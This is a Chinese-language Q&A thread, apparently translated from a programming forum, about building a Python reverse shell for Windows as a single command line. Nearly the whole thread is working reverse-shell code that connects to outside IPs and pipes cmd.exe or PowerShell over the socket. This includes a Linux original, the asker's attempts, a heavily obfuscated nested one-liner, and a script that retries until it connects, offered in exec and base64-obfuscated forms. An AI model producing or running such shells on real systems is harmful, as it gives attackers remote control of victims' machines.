有人能帮我写一个适用于 Windows 的 Python 反向 shell 单行命令吗(必须是 Windows 下的单行命令)?
我正在尝试修改我曾多次使用的Linux版本,但这是我第一次使用Windows。
Linux one liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
这是我目前为止的尝试:
C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"
问题是我确实建立了连接,只是 shell 随即就退出了。有人知道如何解决这个问题,或者能给一些建议吗?
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.0.232] from (UNKNOWN) [10.11.1.31] 1036
因此 subprocess call 的参数必定有误,但我找不出问题所在。cmd.exe 的路径是正确的。我在 cmd 的帮助文档中看不到类似 -i 的对应参数。
有人能指出我正确的方向吗?
编辑:我试过不带任何参数进行 subprocess 调用,但结果仍然相同:连接立即断开。
C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\WINDOWS\system32\cmd.exe']);"
答案 0 :(得分:4)
(@rockstar:我想你和我在研究同一件事!)
虽然不是单行命令,但借鉴 David Cullen 的回答,我拼凑出了这个适用于 Windows 的反向 shell。
declarations
如果有人能把它精简成一行,请随时编辑我的帖子,或改写成你自己的回答……
答案 1 :(得分:2)
根据部署方式的不同,您可能需要指定 python.exe 的路径,如以下代码所示。希望这有帮助。
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
答案 2 :(得分:1)
来自 socket.fileno() 的文档:
在 Windows 下,此方法返回的小整数不能用在需要文件描述符的地方(例如 os.fdopen())。Unix 没有这个限制。
除非您使用的是 Cygwin,否则我认为在 Windows 上不能将 socket.fileno() 的返回值传给 os.dup2()。
我认为在 Windows 上无法用单行命令实现这一点,因为你需要一个包含多条语句的 while 循环。
答案 3 :(得分:0)
根据 Mark E. Haase 的回答,这是我的改进版本[645 个字符](shell=True、text=True、while True: try/except、p.stdin.flush()——后者意味着无需先填满标准输入缓冲区即可执行命令):
import os, socket, subprocess, threading, sys
def s2p(s, p):
while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
def p2s(s, p):
while True: s.send(p.stdout.read(1).encode())
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try: s.connect((sys.argv[1], int(sys.argv[2]))); break
except: pass
p=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
threading.Thread(target=s2p, args=[s,p], daemon=True).start()
threading.Thread(target=p2s, args=[s,p], daemon=True).start()
try: p.wait()
except: s.close(); sys.exit(0)
或者写成(非常丑陋的)单行命令[663 个字符]:
exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try: s.connect((sys.argv[1], int(sys.argv[2]))); break\n except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")
或者写成混淆后的单行命令[892 个字符]:
import base64;exec(base64.b64decode("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"))
它可以像这样直接在命令行中使用:
python -c 'exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try: s.connect((sys.argv[1], int(sys.argv[2]))); break\n except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")'